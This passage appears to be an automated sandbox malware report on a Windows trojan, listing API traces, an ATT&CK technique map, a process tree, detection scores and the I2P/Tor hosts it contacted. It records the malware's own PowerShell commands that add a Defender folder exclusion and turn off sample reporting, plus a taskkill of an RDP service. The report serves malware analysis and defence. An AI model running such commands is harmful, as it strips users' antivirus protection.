Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeCode function: 6_2_00007FF775721131 Sleep,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,_cexit,6_2_00007FF775721131
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeCode function: 6_2_00007FF77573B6B8 QueryFullProcessImageNameW,SetFileAttributesA,SetUnhandledExceptionFilter,TlsGetValue,VirtualProtect,6_2_00007FF77573B6B8
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeCode function: 6_2_00007FF77573B668 IsDBCSLeadByteEx,OpenProcess,QueryFullProcessImageNameW,SetFileAttributesA,SetUnhandledExceptionFilter,TlsGetValue,VirtualProtect,WideCharToMultiByte,6_2_00007FF77573B668
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeCode function: 6_2_00007FF7757305D9 SetUnhandledExceptionFilter,6_2_00007FF7757305D9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF6BE031131 Sleep,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,_cexit,22_2_00007FF6BE031131

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
Source: C:\Users\user\Desktop\cZO.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe Code function: 6_2_00007FF77572292E strlen,strcat,strlen,strlen,strlen,strcat,strlen,strlen,strlen,strcat,LogonUserA,GetLastError,CreateProcessAsUserA,GetLastError,CloseHandle,CreateProcessA,GetLastError,6_2_00007FF77572292E
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 432 -p 6524 -ip 6524
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6524 -s 1236
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe Process created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe Code function: 6_2_00007FF775726FD5 GetSystemTimeAsFileTime,6_2_00007FF775726FD5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 22_2_00007FF8B91538C3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,22_2_00007FF8B91538C3
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: vc71izwl68ub3txurufnpr09g6ni3.exe, 00000006.00000002.2059689197.000001EFE9AD8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 22_2_00007FF8B91709A8 listen,22_2_00007FF8B91709A8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 22_2_00007FF8B915240A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,22_2_00007FF8B915240A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 22_2_00007FF8B915E549 listen,22_2_00007FF8B915E549
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 22_2_00007FF8B91A3A00 listen,22_2_00007FF8B91A3A00
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 22_2_00007FF8B91901A9 listen,22_2_00007FF8B91901A9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 22_2_00007FF8B9184F8A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,22_2_00007FF8B9184F8A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 22_2_00007FF8BA4F240A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,22_2_00007FF8BA4F240A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 22_2_00007FF8BA4FCC19 listen,22_2_00007FF8BA4FCC19
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 22_2_00007FF8BA50F900 listen,22_2_00007FF8BA50F900
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 22_2_00007FF8BFB315FA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,22_2_00007FF8BFB315FA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 22_2_00007FF8BFB4B820 listen,22_2_00007FF8BFB4B820
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 22_2_00007FF8BFB5254A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,22_2_00007FF8BFB5254A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 22_2_00007FF8BFB6E900 listen,22_2_00007FF8BFB6E900
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 22_2_00007FF8BFB8E2B9 listen,22_2_00007FF8BFB8E2B9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 22_2_00007FF8BFB81ADA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,22_2_00007FF8BFB81ADA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 22_2_00007FF8BFBA0920 listen,22_2_00007FF8BFBA0920
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 32_2_00007FF8B915240A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,32_2_00007FF8B915240A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 32_2_00007FF8B9184F8A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,32_2_00007FF8B9184F8A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 32_2_00007FF8BA50240A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,32_2_00007FF8BA50240A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 32_2_00007FF8BFB315FA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,32_2_00007FF8BFB315FA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 32_2_00007FF8BFB5254A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,32_2_00007FF8BFB5254A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 32_2_00007FF8BFB8E2B9 listen,32_2_00007FF8BFB8E2B9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 32_2_00007FF8BFB81ADA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,32_2_00007FF8BFB81ADA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 32_2_00007FF8BFBA0920 listen,32_2_00007FF8BFBA0920
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances; Gather Victim Org Information; Determine Physical Locations; Business Relationships
Resource Development: 1 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains; DNS Server; Virtual Private Server; Server
Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain; Compromise Hardware Supply Chain; Trusted Relationship
Execution: 21 Windows Management Instrumentation; 3 Native API; 2 Command and Scripting Interpreter; 3 Service Execution; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell; Unix Shell; Visual Basic
Persistence: 1 Scripting; 1 DLL Side-Loading; 1 Create Account; 2 Valid Accounts; 4 Windows Service; 1 Services File Permissions Weakness; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Privilege Escalation: 1 DLL Side-Loading; 2 Valid Accounts; 2 Access Token Manipulation; 4 Windows Service; 11 Process Injection; 1 Services File Permissions Weakness; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Defense Evasion: 21 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 1 File Deletion; 21 Masquerading; 2 Valid Accounts; 2 Access Token Manipulation; 41 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Hidden Users; 1 Services File Permissions Weakness
Credential Access: 1 Network Sniffing; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Discovery: 1 System Time Discovery; 1 Account Discovery; 1 System Service Discovery; 3 File and Directory Discovery; 1 Network Sniffing; 44 System Information Discovery; 1 Network Share Discovery; 141 Security Software Discovery; 41 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery; 1 System Network Configuration Discovery; Local Groups
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools; Taint Shared Content; Replication Through Removable Media; Component Object Model and Distributed COM
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging; Screen Capture; Email Collection; Local Email Collection
Command and Control: 4 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 1 Multi-hop Proxy; 3 Non-Application Layer Protocol; 4 Application Layer Protocol; 2 Proxy; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols; DNS; Proxy; Internal Proxy
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol; Exfiltration Over Physical Medium; Exfiltration over USB; Commonly Used Port
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption; Resource Hijacking; Network Denial of Service; Direct Network Flood
Behavior Graph ID: 1584500 | Sample: cZO.exe | Startdate: 05/01/2025 | Architecture: WINDOWS | Score: 100

Start [2]
  DNS/IP: reseed.onion.im [94] (Uses TOR for connection hidding); reseed-pl.i2pd.xyz [96] (Performs DNS queries to domains with low reputation); 2 other IPs or domains [98]
  Signatures: Antivirus detection for URL or domain; Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; 9 other signatures
  Started: cZO.exe [10] (3 created files); main.exe [15]; cZO.exe [17]; 2 other processes [19]

cZO.exe [10]
  DNS/IP: 45.200.148.158, ports 1129, 49704, Africa-on-Cloud-ASZA Seychelles [100]
  Dropped: C:\...\vc71izwl68ub3txurufnpr09g6ni3.exe, PE32+ [82]; C:\Users\user\...\shdpeqdz2a54sj46ur0.exe, PE32+ [84]; C:\Users\user\...\7h14dhb9g32w177ypoi9wje.bat, DOS [86]
  Signatures: Modifies Windows Defender protection settings
  Started: shdpeqdz2a54sj46ur0.exe [21] (10 created files); cmd.exe [25] (1 created file); vc71izwl68ub3txurufnpr09g6ni3.exe [27] (3 created files)

main.exe [15]
  Signatures: Contains functionality to hide user accounts; Found Tor onion address

cZO.exe [17]
  Signatures: Detected unpacking (creates a PE file in dynamic memory)

2 other processes [19]
  Started: WerFault.exe [29]

shdpeqdz2a54sj46ur0.exe [21]
  Dropped: C:\Users\Public\...\main.exe, PE32+ [80]
  Signatures: Multi AV Scanner detection for dropped file; Contains functionality to hide user accounts; Machine Learning detection for dropped file; Found Tor onion address
  Started: sc.exe [31] (1 created file); taskkill.exe [33] (1 created file); sc.exe [35]; 4 other processes [46]

cmd.exe [25]
  Signatures: Modifies Windows Defender protection settings; Adds a directory exclusion to Windows Defender
  Started: powershell.exe [37] (23 created files); powershell.exe [40] (23 created files); powershell.exe [42] (23 created files); conhost.exe [44]

vc71izwl68ub3txurufnpr09g6ni3.exe [27]
  Signatures: Antivirus detection for dropped file

sc.exe [31]
  Started: main.exe [48]; conhost.exe [53]

taskkill.exe [33]
  Started: conhost.exe [55]

sc.exe [35]
  Started: conhost.exe [57]

powershell.exe [37]
  Signatures: Loading BitLocker PowerShell Module

4 other processes [46]
  Started: conhost.exe [59]; conhost.exe [61]; conhost.exe [63]; conhost.exe [65]

main.exe [48]
  DNS/IP: 78.191.208.199 TTNETTR Turkey [88]; reseed-pl.i2pd.xyz 185.226.181.238 RACKMARKTES Spain [90]; 56 other IPs or domains [92]
  Dropped: C:\Windows\Temp\o6oDuAJl, PE32+ [70]; C:\Windows\Temp\YkhL6reh, PE32+ [72]; C:\Windows\Temp\YXkdIYk6, PE32+ [74]; 15 other files (13 malicious) [76]
  Signatures: Multi AV Scanner detection for dropped file; Contains functionality to hide user accounts; Found Tor onion address
  Started: WerFault.exe [67]

WerFault.exe [67]
  Dropped: C:\ProgramData\Microsoft\...\Report.wer, Unicode [78]

Source | Detection | Scanner | Label | Link
cZO.exe | 11% | ReversingLabs | Win64.Trojan.Generic |
cZO.exe | 19% | Virustotal | | Browse
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe | 100% | Avira | TR/AVI.Agent.jibab |
C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe | 100% | Joe Sandbox ML | |
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll | 26% | ReversingLabs | Win64.Trojan.Generic |
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll | 8% | ReversingLabs | Win64.Trojan.Generic |
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll | 32% | ReversingLabs | Win64.Trojan.Generic |
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dll | 3% | ReversingLabs | |
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | 70% | ReversingLabs | Win64.Trojan.Barys |
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll | 8% | ReversingLabs | Win64.Trojan.Generic |
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll | 3% | ReversingLabs | |
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll | 0% | ReversingLabs | |
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll | 3% | ReversingLabs | |
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll | 70% | ReversingLabs | Win64.Trojan.Generic |
C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe | 70% | ReversingLabs | Win64.Trojan.Barys |
C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe | 58% | ReversingLabs | Win64.Trojan.Alevaul |
C:\Windows\Temp\EgwqOk24 | 3% | ReversingLabs | |
C:\Windows\Temp\GEGgzh0s | 0% | ReversingLabs | |
C:\Windows\Temp\GmdNT1AN | 8% | ReversingLabs | Win64.Trojan.Generic |
C:\Windows\Temp\I77yQ5in | 26% | ReversingLabs | Win64.Trojan.Generic |
C:\Windows\Temp\OwuZZod2 | 3% | ReversingLabs | |
C:\Windows\Temp\XpOp833v | 3% | ReversingLabs | |
C:\Windows\Temp\YXkdIYk6 | 70% | ReversingLabs | Win64.Trojan.Generic |
C:\Windows\Temp\YkhL6reh | 32% | ReversingLabs | Win64.Trojan.Generic |
C:\Windows\Temp\o6oDuAJl | 8% | ReversingLabs | Win64.Trojan.Generic |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://banana.incognet.io/p | 0% | Avira URL Cloud | safe |
https://reseed.memcpy.io/ | 0% | Avira URL Cloud | safe |
https://i2pseed.creativecowpat.net:8443/ | 0% | Avira URL Cloud | safe |
https://reseed.memcpy.io:443/i2pseeds.su3 | 0% | Avira URL Cloud | safe |
https://reseed.diva.exchange/b.c | 100% | Avira URL Cloud | malware |
https://reseed.i2pgit.org/i2pseeds.su3 | 100% | Avira URL Cloud | malware |
https://reseed.stormycloud.org/b.c | 0% | Avira URL Cloud | safe |
https://reseed.i2pgit.org:443/i2pseeds.su3 | 100% | Avira URL Cloud | malware |
https://reseed-fr.i2pd.xyz/p | 0% | Avira URL Cloud | safe |
https://reseed-pl.i2pd.xyz:443/i2pseeds.su3 | 0% | Avira URL Cloud | safe |
https://banana.incognet.io/ | 0% | Avira URL Cloud | safe |
https://login.live | 100% | Avira URL Cloud | malware |
https://reseed.i2pgit.org/P# | 100% | Avira URL Cloud | malware |
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt | 0% | Avira URL Cloud | safe |
https://i2p.ghativega.in/ | 0% | Avira URL Cloud | safe |
https://reseed-pl.i2pd.xyz/i2pseeds.su30 | 0% | Avira URL Cloud | safe |
https://i2p.novg.net/ | 0% | Avira URL Cloud | safe |
https://reseed-fr.i2pd.xyz/ | 0% | Avira URL Cloud | safe |
https://www2.mk16.de/ | 0% | Avira URL Cloud | safe |
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt/ | 0% | Avira URL Cloud | safe |
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txtF&P# | 0% | Avira URL Cloud | safe |
http://reg.i2p/hosts.txt | 0% | Avira URL Cloud | safe |
https://reseed.onion.im/i2pseeds.su3 | 0% | Avira URL Cloud | safe |
http://identiguy.i2p/hosts.txt | 0% | Avira URL Cloud | safe |
https://reseed.memcpy.io/hP# | 0% | Avira URL Cloud | safe |
https://reseed.diva.exchange/ | 100% | Avira URL Cloud | malware |
https://reseed.stormycloud.org/ | 0% | Avira URL Cloud | safe |
https://i2pd.readthedocs.io/en/latest/user-guide/configuration/ | 0% | Avira URL Cloud | safe |
https://reseed.i2pgit.org/ | 100% | Avira URL Cloud | malware |
https://i2pseed.creativecowpat.net:8443/G | 0% | Avira URL Cloud | safe |
https://i2p.novg.net/: | 0% | Avira URL Cloud | safe |
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txti2p.su3 | 0% | Avira URL Cloud | safe |
https://reseed-pl.i2pd.xyz:443/i2pseeds.su3T | 0% | Avira URL Cloud | safe |
http://127.0.0.1:8118 | 0% | Avira URL Cloud | safe |
http://stats.i2p/cgi-bin/newhosts.txt | 0% | Avira URL Cloud | safe |
https://reseed-pl.i2pd.xyz/ | 0% | Avira URL Cloud | safe |
https://i2p.mooo.com/netDb/ | 0% | Avira URL Cloud | safe |
https://reseed2.i2p.net/ | 100% | Avira URL Cloud | malware |
https://reseed.onion.im/ | 0% | Avira URL Cloud | safe |
https://reseed.stormycloud.org/?? | 0% | Avira URL Cloud | safe |
https://reseed.stormycloud.org/7 | 0% | Avira URL Cloud | safe |
https://reseed.i2pgit.org/i2pseeds.su30 | 100% | Avira URL Cloud | malware |
https://netdb.i2p2.no/ | 100% | Avira URL Cloud | malware |
https://reseed.i2p-projekt.de/ | 0% | Avira URL Cloud | safe |
https://www2.mk16.de/J | 0% | Avira URL Cloud | safe |
https://reseed-pl.i2pd.xyz/i2pseeds.su3 | 0% | Avira URL Cloud | safe |
http://reg.i2p/hosts.txt9 | 0% | Avira URL Cloud | safe |
https://legit-website.com/i2pseeds.su3 | 0% | Avira URL Cloud | safe |
https://i2p.ghativega.in/b.c | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | high
reseed.i2pgit.org | 68.183.196.133 | true | true | | unknown
reseed.memcpy.io | 95.216.2.172 | true | true | | unknown
reseed.onion.im | 159.223.194.171 | true | true | | unknown
reseed-pl.i2pd.xyz | 185.226.181.238 | true | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://banana.incognet.io/p | main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://reseed.diva.exchange/b.c | main.exe, 00000016.00000002.3155678668.00000223502E7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2471613149.00000223502F9000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://i2pseed.creativecowpat.net:8443/ | main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3262201152.00000270D4100000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.dr | true | Avira URL Cloud: safe | unknown
https://reseed.memcpy.io:443/i2pseeds.su3 | main.exe, 00000016.00000003.2471943070.000002235030D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2471338802.0000022350309000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2471413512.000002235030B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://reseed-pl.i2pd.xyz:443/i2pseeds.su3 | main.exe, 00000016.00000003.2484244836.00000223506CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2494432573.00000223506CE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://reseed.memcpy.io/ | main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.dr | true | Avira URL Cloud: safe | unknown
https://login.microsoftonline.com/ppsecure/ResolveUser.srf | svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdA | svchost.exe, 0000001F.00000003.3143580946.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143291121.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3156389621.000001D379307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3112272695.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111493334.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183931947.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143546975.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263042958.000001D379310000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3156417903.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111460681.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183773272.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3184036782.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3130778572.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 